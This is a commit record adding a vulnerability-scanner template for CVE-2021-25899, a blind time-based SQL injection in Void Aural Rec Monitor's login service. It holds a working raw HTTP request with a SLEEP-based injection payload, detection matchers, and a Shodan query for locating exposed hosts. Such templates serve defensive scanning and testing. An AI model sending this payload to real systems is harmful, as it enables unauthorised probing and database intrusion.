Merge pull request #5527 from edoardottt/CVE-2021-25899

Add CVE-2021-25899
patch-1
Ritik Chaddha 2023-02-09 10:55:17 +05:30 committed by GitHub
commit 12e54d0930
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2021-25899
info:
name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
author: edoardottt
severity: critical
description: |
An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1.
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
- https://nvd.nist.gov/vuln/detail/CVE-2021-25899
classification:
cve-id: CVE-2021-25899
metadata:
shodan-query: html:"AURALL"
tags: cve,cve2021,sqli,void,aurall
requests:
- raw:
- |
POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Contacte con el administrador")'
condition: and